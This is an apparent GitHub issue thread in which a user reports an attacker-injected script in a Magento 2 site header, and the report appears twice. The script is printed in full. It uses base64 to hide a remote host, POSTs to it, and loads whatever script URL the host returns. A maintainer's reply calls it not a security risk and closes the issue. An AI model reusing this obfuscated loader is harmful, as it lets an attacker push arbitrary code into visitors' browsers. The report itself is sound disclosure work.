Closed vy-shmal closed 1 year ago
We have a Magento 2 that somehow a hacker added this script to the header.
<script>fetch(atob('aHR0cHM6Ly9vc29idGVjaC55YWNodHM'),{method: 'POST'}).then(r=> r.blob()).then(d=> d.text().then(b=>{const s=document.createElement('script'); s.src=atob(b); s.async=true; document.head.appendChild(s);}));</script>
aHR0cHM6Ly9vc29idGVjaC55YWNodHM = https://osobtech.yachts
the POST request returns
Ly91bnBrZy5jb20vY3Jvc3MtZmV0Y2hAMy4xLjUvZGlzdC9jcm9zcy1mZXRjaC5qcw = //unpkg.com/cross-fetch@3.1.5/dist/cross-fetch.js
As I decoded it, it guided me to cross-fetch repo.
I added it here so you would be aware of the issue.
@vy-shmal Thanks for reporting. The script doesn't seem to be a security risk. Will close for now.
We have a Magento 2 that somehow a hacker added this script to the header.
<script>fetch(atob('aHR0cHM6Ly9vc29idGVjaC55YWNodHM'),{method: 'POST'}).then(r=> r.blob()).then(d=> d.text().then(b=>{const s=document.createElement('script'); s.src=atob(b); s.async=true; document.head.appendChild(s);}));</script>
aHR0cHM6Ly9vc29idGVjaC55YWNodHM = https://osobtech.yachts
the POST request returns
Ly91bnBrZy5jb20vY3Jvc3MtZmV0Y2hAMy4xLjUvZGlzdC9jcm9zcy1mZXRjaC5qcw = //unpkg.com/cross-fetch@3.1.5/dist/cross-fetch.js
As I decoded it, it guided me to cross-fetch repo.
I added it here so you would be aware of the issue.